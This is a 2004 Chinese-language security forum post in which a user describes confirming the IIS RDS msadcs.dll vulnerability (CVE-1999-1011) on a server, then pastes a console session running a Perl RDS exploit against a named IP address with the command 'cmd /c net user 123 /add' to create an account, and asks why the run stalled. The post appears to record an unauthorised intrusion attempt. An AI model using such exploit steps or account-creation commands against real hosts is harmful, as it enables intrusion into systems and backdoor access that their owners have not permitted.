|
作者: hwb21 [hwb21] 论坛用户 | 登录 |
确认了服务器存在这个漏洞.. ------------------------------------------------------------------- RDS Securty Hole(msadcs.dll) /msadc/msadcs.dll important patch CVE-1999-1011 solution:MS99-025.asp 二、目标开了WEB服务,IIS有漏洞msadcs.dll漏洞,这个漏洞可以用TWWWSCAN扫描 到,为了确认这个漏洞,你可以在浏览器的网址栏里输入这个文件的具体路径来确认 IE将显示application/x_varg,说明这个漏洞存在 -------------------------------------------------------------------- 然后安装了PERL解释器/... 下面是运行的 -------------------------------------------------------------------------- D:\Perl\bin>perl -x msadcs.txt -h 210.43.203.40 -- RDS exploit by rain forest puppy / ADM / Wiretrip -- Please type the NT commandline you want to run (cmd /c assumed): cmd /c net user 123 /add Step 1: Trying raw driver to btcustmr.mdb winnt -> c: Terminating on signal SIGINT(2) D:\Perl\bin> ---------------------------------------------------------------------------- 请问这是怎么回事? |
地主 发表时间: 04-06-20 22:21 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号